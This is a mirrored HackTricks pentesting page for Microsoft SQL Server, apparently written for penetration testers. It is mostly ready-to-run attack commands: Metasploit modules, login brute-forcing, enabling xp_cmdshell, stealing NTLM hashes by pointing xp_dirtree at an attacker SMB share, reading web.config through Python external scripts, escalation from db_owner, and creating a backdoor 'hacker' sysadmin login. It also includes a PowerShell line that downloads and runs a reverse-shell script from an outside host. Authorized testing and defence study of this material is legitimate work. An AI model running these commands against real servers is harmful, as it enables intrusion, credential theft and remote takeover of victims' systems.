mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 17:28:13 +00:00
c19d51a6ba
Added queries for enumerating linked sql servers databases connected to mssql.
213 lines
9.1 KiB
Markdown
213 lines
9.1 KiB
Markdown
# 1433 - Pentesting MSSQL - Microsoft SQL Server
|
|
|
|
## Basic Information
|
|
|
|
**Microsoft SQL Server** is a [relational database management system](https://en.wikipedia.org/wiki/Relational_database_management_system) developed by [Microsoft](https://en.wikipedia.org/wiki/Microsoft). As a [database server](https://en.wikipedia.org/wiki/Database_server), it is a [software product](https://en.wikipedia.org/wiki/Software_product) with the primary function of storing and retrieving data as requested by other [software applications](https://en.wikipedia.org/wiki/Software_application)—which may run either on the same computer or on another computer across a network \(including the Internet\).
|
|
From [wikipedia](https://en.wikipedia.org/wiki/Microsoft_SQL_Server).
|
|
|
|
**Default port:** 1433
|
|
|
|
```text
|
|
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|
|
```
|
|
|
|
Search for _exploits/scripts/auxiliary modules_ that can be helpful to find vulnerabilities in this kind of service:
|
|
|
|
```bash
|
|
searchsploit "microsoft sql server"
|
|
nmap --script-help "*ms* and *sql*"
|
|
msf> search mssql
|
|
```
|
|
|
|
## Information
|
|
|
|
### **Default MS-SQL System Tables**
|
|
|
|
* **master Database** : Records all the system-level information for an instance of SQL Server.
|
|
* **msdb Database** : Is used by SQL Server Agent for scheduling alerts and jobs.
|
|
* **model Database** : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
|
|
* **Resource Database** : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
|
|
* **tempdb Database** : Is a work-space for holding temporary objects or intermediate result sets.
|
|
|
|
## Info Gathering
|
|
|
|
If you don't know nothing about the service:
|
|
|
|
```bash
|
|
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
|
|
msf> use auxiliary/scanner/mssql/mssql_ping
|
|
```
|
|
|
|
If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username.
|
|
|
|
### Metasploit
|
|
|
|
```bash
|
|
#Set USERNAME, RHOSTS and PASSWORD
|
|
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
|
|
|
|
#Steal NTLM
|
|
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
|
|
|
|
#Info gathering
|
|
msf> use admin/mssql/mssql_enum #Security checks
|
|
msf> use admin/mssql/mssql_enum_domain_accounts
|
|
msf> use admin/mssql/mssql_enum_sql_logins
|
|
msf> use auxiliary/admin/mssql/mssql_findandsampledata
|
|
msf> use auxiliary/scanner/mssql/mssql_hashdump
|
|
msf> use auxiliary/scanner/mssql/mssql_schemadump
|
|
|
|
#Search for insteresting data
|
|
msf> use auxiliary/admin/mssql/mssql_findandsampledata
|
|
msf> use auxiliary/admin/mssql/mssql_idf
|
|
|
|
#Privesc
|
|
msf> use exploit/windows/mssql/mssql_linkcrawler
|
|
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
|
|
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
|
|
|
|
#Code execution
|
|
msf> use admin/mssql/mssql_exec #Execute commands
|
|
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
|
|
|
|
#Add new admin user from meterpreter session
|
|
msf> use windows/manage/mssql_local_auth_bypass
|
|
```
|
|
|
|
### \*\*\*\*[**Brute force**](../brute-force.md#sql-server)\*\*\*\*
|
|
|
|
## Tricks
|
|
|
|
### Execute commands
|
|
|
|
```bash
|
|
#Username + Password + CMD command
|
|
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
|
|
#Username + Hash + PS command
|
|
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
|
|
|
|
#this turns on advanced options and is needed to configure xp_cmdshell
|
|
sp_configure 'show advanced options', '1'
|
|
RECONFIGURE
|
|
#this enables xp_cmdshell
|
|
sp_configure 'xp_cmdshell', '1'
|
|
RECONFIGURE
|
|
# Quickly check what the service account is via xp_cmdshell
|
|
EXEC master..xp_cmdshell 'whoami'
|
|
```
|
|
|
|
### NTLM Service Hash gathering
|
|
|
|
[You can extract the](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [**NTLM hash**](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [of the user making the service authenticate against you.](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/)
|
|
You should start a **SMB server** to capture the hash used in the authentication \(impacket-smbserver or responder for example\).
|
|
|
|
```bash
|
|
xp_dirtree '\\<attacker_IP>\any\thing'
|
|
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
|
|
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
|
|
```
|
|
|
|
### Abusing MSSQL trusted Links
|
|
|
|
\*\*\*\*[**Read this post**](../windows/active-directory-methodology/mssql-trusted-links.md) **to find more information about how to abuse this feature**
|
|
|
|
### **Read files executing scripts \(Python and R\)**
|
|
|
|
MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
|
|
|
|
Example trying to execute a **'R'** _"Hellow World!"_ **not working**:
|
|
|
|
![](../.gitbook/assets/image%20%2813%29.png)
|
|
|
|
Example using configured python to perform several actions:
|
|
|
|
```sql
|
|
#Print the user being used (and execute commands)
|
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
|
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
|
|
#Open and read a file
|
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
|
|
#Multiline
|
|
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
|
|
import sys
|
|
print(sys.version)
|
|
'
|
|
GO
|
|
```
|
|
|
|
### From db\_owner to sysadmin
|
|
|
|
[If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)
|
|
|
|
```bash
|
|
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
|
|
```
|
|
|
|
### Impersonation of other users
|
|
|
|
[IMPERSONATE privilege can lead to privilege escalation in SQL Server.](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/)
|
|
|
|
```bash
|
|
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
|
|
```
|
|
|
|
### Using MSSQL for Persistence
|
|
|
|
[https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)
|
|
|
|
## Having credentials
|
|
|
|
### Mssqlclient.py
|
|
|
|
You can login into the service using **impacket mssqlclient.py**
|
|
|
|
```bash
|
|
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
|
|
|
|
#Once logged in you can run queries:
|
|
SQL> select @@ version;
|
|
|
|
#Steal NTLM hash
|
|
sudo responder -I <interface> #Run that in other console
|
|
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
|
|
|
|
#Try to enable code execution
|
|
SQL> enable_xp_cmdshell
|
|
|
|
#Execute code, 2 sintax, for complex and non complex cmds
|
|
SQL> xp_cmdshell whoami /all
|
|
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
|
|
```
|
|
|
|
### sqsh
|
|
|
|
```bash
|
|
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
|
|
```
|
|
|
|
![](../.gitbook/assets/image%20%28286%29.png)
|
|
|
|
## Manual
|
|
|
|
```sql
|
|
SELECT name FROM master.dbo.sysdatabases #Get databases
|
|
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
|
|
#List Linked Servers
|
|
EXEC sp_linkedservers
|
|
SELECT * FROM sys.servers;
|
|
#List users
|
|
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
|
|
#Create user with sysadmin privs
|
|
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
|
|
sp_addsrvrolemember 'hacker', 'sysadmin'
|
|
```
|
|
|
|
## Post Explotation
|
|
|
|
The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**
|
|
You probably will be able to escalate to Administrator using this token: [Juicy-potato](https://github.com/ohpe/juicy-potato)
|
|
|
|
## Shodan
|
|
|
|
* `port:1433 !HTTP`
|
|
|